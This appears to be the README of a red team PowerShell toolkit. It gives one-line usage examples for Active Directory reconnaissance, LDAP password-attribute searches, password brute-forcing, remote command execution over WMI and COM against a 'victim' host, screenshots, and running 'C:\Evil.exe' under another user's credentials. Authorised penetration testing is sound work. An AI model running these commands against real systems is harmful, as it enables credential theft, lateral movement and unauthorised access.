Red Team Powershell Scripts: PowerShell scripts for Red Team
- Search-EventForUser.ps1: PowerShell script that searches the Windows event logs for one or more specific users
Usage:
Import-Module .\Search-EventForUser.ps1; Search-EventForUser -TargetUser "MrUn1k0d3r"
Import-Module .\Search-EventForUser.ps1; "MrUn1k0d3r" | Search-EventForUser
Import-Module .\Search-EventForUser.ps1; Search-EventForUser -TargetUser MrUn1k0d3r -ComputerName DC01
Import-Module .\Search-EventForUser.ps1; Search-EventForUser -TargetUser MrUn1k0d3r -FindDC true
Import-Module .\Search-EventForUser.ps1; "god", "mom" | Search-EventForUser -FindDC true
Import-Module .\Search-EventForUser.ps1; "god", "mom" | Search-EventForUser -FindDC true -Username DOMAIN\admin -Password "123456"
The -TargetUser parameter accepts a single user or a list of users from the pipeline.
- Search-FullNameToSamAccount.ps1: Resolve a full name to its SamAccountName
Usage:
Import-Module .\Search-FullNameToSamAccount.ps1; Search-FullNameToSamAccount -Filter *god*
Import-Module .\Search-FullNameToSamAccount.ps1; "god", "mom" | Search-FullNameToSamAccount
- Search-UserPassword.ps1: Search LDAP for the userPassword attribute
Usage:
Import-Module .\Search-UserPassword.ps1; Search-UserPassword -Username *god*
Import-Module .\Search-UserPassword.ps1; "god", "mom" | Search-UserPassword
- Remote-WmiExecute.ps1: Execute a command remotely using WMI
Usage:
Import-Module .\Remote-WmiExecute.ps1; Remote-WmiExecute -ComputerName victim01 -Payload "cmd.exe /c whoami"
- Take-Screenshot.ps1: Take a screenshot (PNG)
Usage:
Import-Module .\Take-Screenshot.ps1; Take-Screenshot -Path C:\test.png
- Get-BrowserHomepage.ps1: Get the browser homepage
Usage:
Import-Module .\Get-BrowserHomepage.ps1; Get-BrowserHomepage
- Get-IEBookmarks.ps1: List the URLs of all Internet Explorer bookmarks
Usage:
Import-Module .\Get-IEBookmarks.ps1; Get-IEBookmarks
- Invoke-ADPasswordBruteForce.ps1: Test users' passwords
Usage:
Import-Module .\Invoke-ADPasswordBruteForce.ps1; Invoke-ADPasswordBruteForce -Username "mr.un1k0d3r" -Password "password"
Import-Module .\Invoke-ADPasswordBruteForce.ps1; "neo", "morpheus" | Invoke-ADPasswordBruteForce -Password "password"
Import-Module .\Invoke-ADPasswordBruteForce.ps1; "neo", "morpheus" | Invoke-ADPasswordBruteForce -Password "password" -Domain MATRIX
- Remote-COMShellExec.ps1: Execute a command remotely using COM
Usage:
Import-Module .\Remote-COMShellExec.ps1; Remote-COMShellExec -ComputerName 192.168.1.1 -Command "cmd.exe" -Argument "/c whoami"
- Utility.ps1: Contains the following cmdlets:
  - Search-EventForUser
  - Search-FullNameToSamAccount
  - Ldap-GetProperty
  - Search-UserPassword
  - Dump-UserEmail
  - Dump-Computers
  - Dump-UserName
- Run-As.ps1: Run a process as another user (with explicit credentials)
Usage:
Import-Module .\Run-As.ps1; Run-As -Username RingZer0\Mr.Un1k0d3r -Password "IShouldNotLeakThisPasswordOnTheInternet" -Process "C:\Evil.exe"
- COM-Utility.ps1: Contains the following cmdlets:
  - Invoke-COM-ScheduleService
  - Invoke-COM-XMLHTTP
  - Invoke-COM-ShellBrowserWindow
  - Invoke-COM-WindowsScriptHost
  - Invoke-COM-ProcessChain
  - Invoke-COM-ShellApplication